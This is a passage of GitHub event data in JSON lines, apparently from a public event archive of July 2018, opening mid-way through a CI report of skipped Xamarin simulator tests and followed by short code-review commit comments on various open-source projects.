Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 64-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/tvOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/tvOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mini/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link all/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/watchOS - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/watchOS - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * MTouch tests/NUnit: Failed (Execution failed with exit code 2)\n"}},"created_at":"2018-07-06T20:31:51Z"}
{"id":"7930819799","type":"CommitCommentEvent","actor":{"login":"dubslow"},"repo":{"name":"mooskagh/lc0"},"payload":{"comment":{"id":29625950,"position":25,"line":39,"path":"src/mcts/node.h","commit_id":"c492377196d863c017ed7c9b73332f3009dc7923","created_at":"2018-07-06T20:32:39Z","updated_at":"2018-07-06T20:32:39Z","author_association":"NONE","body":"Why have two different functions which are identical?\r\n\r\n`Move GetMove(bool flip=false) const;`"}},"created_at":"2018-07-06T20:32:39Z"}
{"id":"7930820547","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"sachinpunadikar/nfs-ganesha"},"payload":{"comment":{"id":29625951,"position":43,"line":1852,"path":"src/support/export_mgr.c","commit_id":"b8a566c86dd62d46d5b56aaa336742158d4373c9","created_at":"2018-07-06T20:32:51Z","updated_at":"2018-07-06T20:32:51Z","author_association":"NONE","body":"This needs enhancement to OUT all pools from the pool list. For now, we can have this way."}},"created_at":"2018-07-06T20:32:51Z"}
{"id":"7930821636","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29625954,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T20:33:09Z","updated_at":"2018-07-06T20:33:09Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T20:33:09Z"}
{"id":"7930822219","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29625956,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-06T20:33:18Z","updated_at":"2018-07-06T20:33:18Z","author_association":"MEMBER","body":"@ypid I played with this extensively... what do you think about this version?"}},"created_at":"2018-07-06T20:33:18Z"}
{"id":"7930826737","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29625959,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-06T20:34:31Z","updated_at":"2018-07-06T20:34:31Z","author_association":"MEMBER","body":"cc @fabianfrz "}},"created_at":"2018-07-06T20:34:31Z"}
{"id":"7930828532","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29625962,"position":null,"line":null,"path":null,"commit_id":"6fb0a12f199d831f1e54438adfcd8049e8bcb774","created_at":"2018-07-06T20:35:01Z","updated_at":"2018-07-06T20:35:01Z","author_association":"NONE","body":"A post about this result here\r\nhttps://groups.google.com/d/msg/fishcooking/ZO0vF2Z6UME/45Hb5LRFCgAJ"}},"created_at":"2018-07-06T20:35:01Z"}
{"id":"7930829345","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29625965,"position":34,"line":191,"path":"prov/mrail/src/mrail_cq.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:35:13Z","updated_at":"2018-07-06T20:35:13Z","author_association":"NONE","body":"We will need to look at the locking.  The above push calls will both acquire/release the same lock.  It may be better to allocate a request and all needed subrequest structures at once, and free them together.  This will reduce the number of times that we acquire/release locks.  The drawback is that we'll hold onto the structures longer than needed."}},"created_at":"2018-07-06T20:35:13Z"}
{"id":"7930829365","type":"CommitCommentEvent","actor":{"login":"jlevy"},"repo":{"name":"jlevy/atom-flowmark"},"payload":{"comment":{"id":29625966,"position":5,"line":285,"path":"tests/testdoc.flowmark.md","commit_id":"13efaf9d578ed620a1882e20e5e22e3c4346f0e6","created_at":"2018-07-06T20:35:14Z","updated_at":"2018-07-06T20:35:14Z","author_association":"OWNER","body":"This should wrap at the sentence. #13 "}},"created_at":"2018-07-06T20:35:14Z"}
{"id":"7930833630","type":"CommitCommentEvent","actor":{"login":"bbarker"},"repo":{"name":"cul-it/arxiv-browse"},"payload":{"comment":{"id":29625971,"position":null,"line":null,"path":null,"commit_id":"5c38ebf7c006a02eb3e88e368fef217b5df10c46","created_at":"2018-07-06T20:36:19Z","updated_at":"2018-07-06T20:36:19Z","author_association":"NONE","body":"Looks good, thanks for fixing this"}},"created_at":"2018-07-06T20:36:19Z"}
{"id":"7930833998","type":"CommitCommentEvent","actor":{"login":"Daudre-Vignier-Charles"},"repo":{"name":"Daudre-Vignier-Charles/davi.org.zsh"},"payload":{"comment":{"id":29625973,"position":null,"line":null,"path":null,"commit_id":"2238d534f527dbcfca0a9461f680498cb3ff1684","created_at":"2018-07-06T20:36:24Z","updated_at":"2018-07-06T20:36:24Z","author_association":"OWNER","body":"Move some zshenv files into autoload folder."}},"created_at":"2018-07-06T20:36:24Z"}
{"id":"7930836323","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"winstonjs/winston-daily-rotate-file"},"payload":{"comment":{"id":29625981,"position":4,"line":153,"path":"daily-rotate-file.js","commit_id":"3d8674f340632c4422eaf2dbc31a80107f7bdd6a","created_at":"2018-07-06T20:36:57Z","updated_at":"2018-07-06T20:36:57Z","author_association":"NONE","body":"Sounds awesome, i’ll on it in a few days / weeks. Ain’t an urgency for us, but still :) thanks for the feedback and help!"}},"created_at":"2018-07-06T20:36:57Z"}
{"id":"7930840943","type":"CommitCommentEvent","actor":{"login":"taisph"},"repo":{"name":"taisph/laravel-opentracing"},"payload":{"comment":{"id":29625992,"position":27,"line":27,"path":"src/LocalScope.php","commit_id":"badd4e37d876c5ab5501a9cd345f575e85cacff7","created_at":"2018-07-06T20:38:02Z","updated_at":"2018-07-06T20:38:02Z","author_association":"OWNER","body":"Yes, it's autogenerated. Overall cleanup and a proper readme is definitely required before a proper release is made."}},"created_at":"2018-07-06T20:38:02Z"}
{"id":"7930841371","type":"CommitCommentEvent","actor":{"login":"thehogfather"},"repo":{"name":"protovist/ccminer"},"payload":{"comment":{"id":29625996,"position":9,"line":2106,"path":"ccminer.cpp","commit_id":"c54f6f4dc05303f4ff0c755f78d65b210c4d1961","created_at":"2018-07-06T20:38:08Z","updated_at":"2018-07-06T20:38:08Z","author_association":"NONE","body":"@protovist what is the purpose of duplicating the last two lines?"}},"created_at":"2018-07-06T20:38:08Z"}
{"id":"7930844614","type":"CommitCommentEvent","actor":{"login":"x-tec2017"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29626002,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-06T20:38:53Z","updated_at":"2018-07-06T20:38:53Z","author_association":"NONE","body":"++ copier\nWhat is this file submitted for and what should I do about it?\n\nOn Fri, Jul 6, 2018 at 4:20 PM, Ryan Sherwood <notifications@github.com>\nwrote:\n\n> \"++ copier\" does this.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Pinacolada64/ImageBBS/commit/69ec3d3316d958b615fffb3c3c8f25c9a9424397#commitcomment-29625843>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AganoUnG_gN4x3RXujMxo2PChz_ODjuGks5uD8aJgaJpZM4VF-qz>\n> .\n>\n"}},"created_at":"2018-07-06T20:38:53Z"}
{"id":"7930846500","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626005,"position":74,"line":243,"path":"prov/mrail/src/mrail_cq.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:39:23Z","updated_at":"2018-07-06T20:39:23Z","author_association":"NONE","body":"Please declare all stack variables at the top of the function.  This makes them easier to find later when reading through code.\r\n\r\nAlso, the util CQ code will do this sort of EP progress loop.  Is the common code usable?  This code is not protecting against the CQ's EP list being modified."}},"created_at":"2018-07-06T20:39:23Z"}
{"id":"7930847980","type":"CommitCommentEvent","actor":{"login":"sergpolly"},"repo":{"name":"dekkerlab/cooltools"},"payload":{"comment":{"id":29626009,"position":null,"line":null,"path":null,"commit_id":"3e1350e7e4f89904b06d8ab95c6031c20c496bd6","created_at":"2018-07-06T20:39:46Z","updated_at":"2018-07-06T20:39:46Z","author_association":"MEMBER","body":"\"\"\"O_bal[np.tril_indices_from(O_bal,k=(i0-j0)-1)]\"\"\" should work fine, however more testing is needed before we retire \"\"\"upper_band = (peaks_df[\"bin1_id\"] < peaks_df[\"bin2_id\"])\"\"\".\r\nProof is attached as a picture:\r\n![screenshot from 2018-07-06 16-36-03](https://user-images.githubusercontent.com/6790270/42399263-276d53c6-813b-11e8-9943-1fa765b553b5.png)\r\n"}},"created_at":"2018-07-06T20:39:46Z"}
{"id":"7930848591","type":"CommitCommentEvent","actor":{"login":"AlphaSylan"},"repo":{"name":"AlphaSylan/pokemon-victory-fire"},"payload":{"comment":{"id":29626012,"position":1,"line":1,"path":"http/www.arcadespot.com/game/pokemon-victory-fire/link","commit_id":"c638fd20f5fa606c3381f4a760546532e4429cb6","created_at":"2018-07-06T20:39:53Z","updated_at":"2018-07-06T20:39:53Z","author_association":"OWNER","body":"http://www.arcadespot.com/game/pokemon-victory-fire/"}},"created_at":"2018-07-06T20:39:53Z"}
{"id":"7930848613","type":"CommitCommentEvent","actor":{"login":"haojin2"},"repo":{"name":"mli/gluon-tutorials-zh"},"payload":{"comment":{"id":29626013,"position":5,"line":14,"path":"chapter_appendix/jupyter.md","commit_id":"27551953ee7edbabdf68b07a055d310f90fa44e2","created_at":"2018-07-06T20:39:53Z","updated_at":"2018-07-06T20:39:53Z","author_association":"CONTRIBUTOR","body":"找不到`test.ipynb`，是不是用“创建” instead of “创建了”"}},"created_at":"2018-07-06T20:39:53Z"}
{"id":"7930852921","type":"CommitCommentEvent","actor":{"login":"glatteis"},"repo":{"name":"SORCEway/SORCEway"},"payload":{"comment":{"id":29626022,"position":null,"line":null,"path":null,"commit_id":"091536e25001647137b35bca645fd60e0f183787","created_at":"2018-07-06T20:40:48Z","updated_at":"2018-07-06T20:40:48Z","author_association":"CONTRIBUTOR","body":":-("}},"created_at":"2018-07-06T20:40:48Z"}
{"id":"7930857096","type":"CommitCommentEvent","actor":{"login":"magicknight"},"repo":{"name":"SpiderClub/haipproxy"},"payload":{"comment":{"id":29626030,"position":null,"line":null,"path":null,"commit_id":"0441f700df4adf7e5e3c7745ef8b5d38f57dc9ad","created_at":"2018-07-06T20:41:55Z","updated_at":"2018-07-06T20:41:55Z","author_association":"NONE","body":"alpine 不用 apt 吧。"}},"created_at":"2018-07-06T20:41:55Z"}
{"id":"7930858284","type":"CommitCommentEvent","actor":{"login":"QuinnTDIP"},"repo":{"name":"DynoCC/Dyno-Custom-Commands"},"payload":{"comment":{"id":29626035,"position":4,"line":10,"path":"_config.yml","commit_id":"5d2d04996b7ce6a2085dd815e792d1b16a3d0e0a","created_at":"2018-07-06T20:42:13Z","updated_at":"2018-07-06T20:42:13Z","author_association":"MEMBER","body":"You realize our tracking code is now public........"}},"created_at":"2018-07-06T20:42:13Z"}
{"id":"7930860414","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626042,"position":72,"line":72,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:42:49Z","updated_at":"2018-07-06T20:42:49Z","author_association":"NONE","body":"This is a lengthy function to mark as inline.  Please work with Arun to update ofi_iov.h  with generic functions to manipulate iovecs."}},"created_at":"2018-07-06T20:42:49Z"}
{"id":"7930860897","type":"CommitCommentEvent","actor":{"login":"damencho"},"repo":{"name":"jitsi/jitsi-meet"},"payload":{"comment":{"id":29626045,"position":14,"line":70,"path":"resources/prosody-plugins/util.lib.lua","commit_id":"fa9a4480e619c3d0b969225bbdc2a88e3c6072b6","created_at":"2018-07-06T20:42:57Z","updated_at":"2018-07-06T20:42:57Z","author_association":"MEMBER","body":"This breaks for example https://github.com/jitsi/jitsi-meet/blob/master/resources/prosody-plugins/mod_muc_size.lua#L120\r\nwhich replies with content."}},"created_at":"2018-07-06T20:42:57Z"}
{"id":"7930861409","type":"CommitCommentEvent","actor":{"login":"JulioAndy"},"repo":{"name":"JulioAndy/telegrama-de-alfabetizaci-n"},"payload":{"comment":{"id":29626046,"position":null,"line":null,"path":null,"commit_id":"9dd7067b210df272b6711a6eb58d28a1a15ccc0d","created_at":"2018-07-06T20:43:06Z","updated_at":"2018-07-06T20:43:06Z","author_association":"OWNER","body":"[ITSH-VI-PO-001-05 REPORTE RES E INCID Pemex.docx](https://github.com/JulioAndy/telegrama-de-alfabetizaci-n/files/2171915/ITSH-VI-PO-001-05.REPORTE.RES.E.INCID.Pemex.docx)\r\n"}},"created_at":"2018-07-06T20:43:06Z"}
{"id":"7930862212","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29626048,"position":null,"line":null,"path":null,"commit_id":"a0fa793d2f2bbd9a5c60c0a306285219194d2ec2","created_at":"2018-07-06T20:43:18Z","updated_at":"2018-07-06T20:43:18Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [planmigrat](https://planmigrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://planmigrat-static-docs.pantheonsite.io/docs/new-plans-faq)\n"}},"created_at":"2018-07-06T20:43:18Z"}
{"id":"7930862448","type":"CommitCommentEvent","actor":{"login":"Tangol"},"repo":{"name":"villagedefrance/OpenCart-Overclocked"},"payload":{"comment":{"id":29626050,"position":null,"line":null,"path":null,"commit_id":"4c67a70ae741c7d0be423b8077e6464e7b56c381","created_at":"2018-07-06T20:43:22Z","updated_at":"2018-07-06T20:43:22Z","author_association":"NONE","body":"Now it works fine.\r\n\r\nWith the latest commit, I think all v1.11.0 issues were fixed, so it's time to push for a stable **v1.11.1**.\r\nThanks!"}},"created_at":"2018-07-06T20:43:22Z"}
{"id":"7930863010","type":"CommitCommentEvent","actor":{"login":"protovist"},"repo":{"name":"protovist/ccminer"},"payload":{"comment":{"id":29626051,"position":9,"line":2106,"path":"ccminer.cpp","commit_id":"c54f6f4dc05303f4ff0c755f78d65b210c4d1961","created_at":"2018-07-06T20:43:31Z","updated_at":"2018-07-06T20:43:31Z","author_association":"OWNER","body":"There are 16 bytes of nonce and ccminer only uses the last 32-bits.\r\n"}},"created_at":"2018-07-06T20:43:31Z"}
{"id":"7930863331","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"blechta/tuc-fenics-recipes"},"payload":{"comment":{"id":29626052,"position":7,"line":5,"path":"build.sh","commit_id":"b2dfe1534b3b2d0b12b16a2451b3f620cd2b8103","created_at":"2018-07-06T20:43:36Z","updated_at":"2018-07-06T20:43:36Z","author_association":"OWNER","body":"Ok, sorry I didn't know `nproc` is giving number of CPUs. Anyway it seems wrong to me to be so greedy by default. But feel free to change back to `$(nproc)`."}},"created_at":"2018-07-06T20:43:36Z"}
{"id":"7930865905","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"quidsup/notrack"},"payload":{"comment":{"id":29626062,"position":null,"line":null,"path":null,"commit_id":"2733d072bdd1959d5aa228a7aa885970d3ad895a","created_at":"2018-07-06T20:44:18Z","updated_at":"2018-07-06T20:44:18Z","author_association":"NONE","body":"Ffs not this microsoft owns github bullshit again"}},"created_at":"2018-07-06T20:44:18Z"}
{"id":"7930869872","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626067,"position":109,"line":109,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:45:25Z","updated_at":"2018-07-06T20:45:25Z","author_association":"NONE","body":"Here and above, we init k to 0, increment in the while loop before using it, and then take k + 1 at the end.  We can init k = 1, increment k at the end of the loop, and drop the +1 instead."}},"created_at":"2018-07-06T20:45:25Z"}
{"id":"7930873839","type":"CommitCommentEvent","actor":{"login":"shefty"},"repo":{"name":"yburette/libfabric"},"payload":{"comment":{"id":29626075,"position":207,"line":207,"path":"prov/mrail/src/mrail_rma.c","commit_id":"69e76689081e2d11f7a02d190a32e2c476679237","created_at":"2018-07-06T20:46:30Z","updated_at":"2018-07-06T20:46:30Z","author_association":"NONE","body":"make sure dead code gets dropped before opening a PR."}},"created_at":"2018-07-06T20:46:30Z"}
{"id":"7930876554","type":"CommitCommentEvent","actor":{"login":"magicknight"},"repo":{"name":"SpiderClub/haipproxy"},"payload":{"comment":{"id":29626077,"position":null,"line":null,"path":null,"commit_id":"0441f700df4adf7e5e3c7745ef8b5d38f57dc9ad","created_at":"2018-07-06T20:47:12Z","updated_at":"2018-07-06T20:47:12Z","author_association":"NONE","body":"libffi， libxml2， 这些包前面不是安装了吗，为什么又加一行还是用 apt 来装。\r\n"}},"created_at":"2018-07-06T20:47:12Z"}
{"id":"7930880843","type":"CommitCommentEvent","actor":{"login":"Eijebong"},"repo":{"name":"alexcrichton/xz2-rs"},"payload":{"comment":{"id":29626084,"position":null,"line":null,"path":null,"commit_id":"696882cf490a4885976ab880aa717ae574c64de2","created_at":"2018-07-06T20:48:19Z","updated_at":"2018-07-06T20:48:19Z","author_association":"NONE","body":"Any chance to get this released to dedupe filetime in rustc ? :) "}},"created_at":"2018-07-06T20:48:19Z"}
